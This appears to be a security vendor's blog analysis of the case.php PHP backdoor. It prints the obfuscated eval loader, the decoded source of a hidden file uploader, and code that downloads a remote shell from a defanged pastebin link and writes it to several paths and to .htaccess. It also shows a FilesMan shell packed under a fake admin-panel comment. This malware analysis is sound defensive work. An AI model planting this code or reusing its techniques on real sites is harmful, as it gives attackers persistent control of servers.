case.php malware

by

This case.php malware uses Obfuscation PHP code.

/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator
This code was created on Tuesday, October 11th, 2016 at 20:42 UTC from IP 127.0.0.1
Checksum: 8cd43e5661300d78ed1687053d51d6b3f2647d76
*/
$w03728af="\x62\x61\x73\x65\66\x34\137\144\145\143\157\x64\145";@eval($w03728af(
"Ly9OTHRScS9mcjJYRzZhM3FPd3lza0FCeXYrVWJ2R281ZVdiTFpWUWJTZVFNbE0wMjh0dFZzMGdKcVJ
GV0EyZG43aXZ1RktUVytIQmJwNjFlWXpzRHdob3hQUEtTRFViMzAvVUZzYUpoOTlEcmpJTHRSMTdiL1d

Decoding Obfuscation

There is tools to Decoding ObfuscatePHP code:

https://www.unphp.net
http://ddecode.com/phpdecoder/
http://lombokcyber.com/en/detools/decode-fopo

,but they don’t always work as except.

That’s why we decrypted this manually.

Source case.php

error_reporting(0);
 if ($_GET["up"] == "kido"){ echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
 $filename = $_FILES['file']['name'];
 $filetmp = $_FILES['file']['tmp_name'];
 echo "<form method='POST' enctype='multipart/form-data'>
        <input type='file'name='file' />
        <input type='submit' value='go' />
</form>";
 if(move_uploaded_file($filetmp,$filename)=='1'){ echo '<b>'.$filename;
 } } if ($_GET["up"] == "loba"){ $shell=file_get_contents('hxxp://pastebin.com/raw/********');
 $sh=fopen("../../plug.php", "w");
 fwrite($sh,$shell);
 fclose($sh);
 $sh11=fopen("../../../xmle.php", "w");
 fwrite($sh11,$shell);
 fclose($sh11);
 $sh22=fopen("../id.php", "w");
 fwrite($sh22,$shell);
 fclose($sh22);
 echo " shell Uploadet =>> success.php";
 } if ($_GET["up"] == "htc"){ $shell=file_get_contents('hxxp://pastebin.com/raw/********');
 $sh=fopen("./.htaccess", "w");
 fwrite($sh,$shell);
 fclose($sh);
 echo " shell Uploadet =>> htc";
 } if ($_GET["up"] == "cp"){ $shell=file_get_contents('hxxp://pastebin.com/raw/********');
 $sh=fopen("../../modulse.php", "w");
 fwrite($sh,$shell);
 fclose($sh);
 echo " shell Uploadet =>> htc";
 }

Again, this malware tries load more backdoor files to the server to get full control.

plug.php FilesMan Shell

FilesMan Shell crypted with base64 encoding, str_rot13 and packed with gzinflate:

/**
  * Homepage and main page for admin panel, index.php
  * @category admin
  *
  * @author PatosMercado <contato@patosmercado.com.br>
  * @copyright PatosMercado
  * @license http://www.opensource.org/licenses/osl-3.0.php Open-source licence 3.0
  * @version 1.3
  *
  */

$joomlahindex="5b14ShvH0ij82Xut/R+GiZKRbyEkbns7gHEwBhtfwOHiG/goI3YkWhh2lJkRgjj890ZIfZ+LEEH287x0vSQGqbu6uvpJXV1IXV3qhU4YT$

eval(gzinflate(str_rot13(base64_decode($joomlahindex))))

Final words

Websites that using Malware Expert – ModSecurity rules are protected against this backdoor.

Use Malware Expert – Signatures detect this backdoor malware from files for FREE!